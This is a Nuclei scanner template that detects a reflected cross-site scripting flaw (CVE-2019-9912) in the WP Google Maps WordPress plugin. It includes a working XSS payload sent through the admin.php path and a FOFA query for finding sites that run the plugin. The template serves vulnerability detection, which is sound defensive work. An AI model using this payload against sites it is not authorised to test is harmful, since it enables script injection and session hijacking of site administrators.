id: CVE-2019-9912

info:
  name: WP Google Maps < 7.10.43 - Cross-Site Scripting
  author: ritikchaddha
  severity: medium
  description: |
    The wp-google-maps plugin before 7.10.43 for WordPress has XSS via the wp-admin/admin.php PATH_INFO.
  impact: |
    Attackers can execute arbitrary scripts in the admin context, potentially leading to session hijacking or privilege escalation.
  remediation: |
    Update to version 7.10.43 or later.
  reference:
    - https://lists.openwall.net/full-disclosure/2019/02/05/13
    - https://security-consulting.icu/blog/2019/02/wordpress-wpgooglemaps-xss/
    - https://nvd.nist.gov/vuln/detail/CVE-2019-9912
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2019-9912
    cwe-id: CWE-79
    epss-score: 0.03028
    epss-percentile: 0.85758
    cpe: cpe:2.3:a:wpgmaps:wp_go_maps:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 1
    fofa-query: body="/wp-content/plugins/wp-google-maps"
    vendor: codecabin
    product: wp_go_maps
  tags: cve,cve2019,wp,wp-plugin,wordpress,xss,wp-go-maps,vuln

flow: http(1) && http(2)

http:
  - method: GET
    path:
      - "{{BaseURL}}"

    matchers:
      - type: word
        part: body
        words:
          - "/wp-content/plugins/wp-google-maps"
        internal: true

  - method: GET
    path:
      - "{{BaseURL}}/wp-admin/admin.php/'\"><img src=x onerror=alert(document.domain)>?page=wp-google-maps-menu&action=foo"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "><img src=x onerror=alert(document.domain)>"

      - type: word
        part: content_type
        words:
          - text/html

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100aece870744ecf0b67061aa6c1c43fa633899111584b99d682a12ce072e1dbd0b02203c4eab2c632b720492701b36eadf53d294ae24e72311f2d0b62d174dd940c4a3:922c64590222798bb761d5b6d8e72950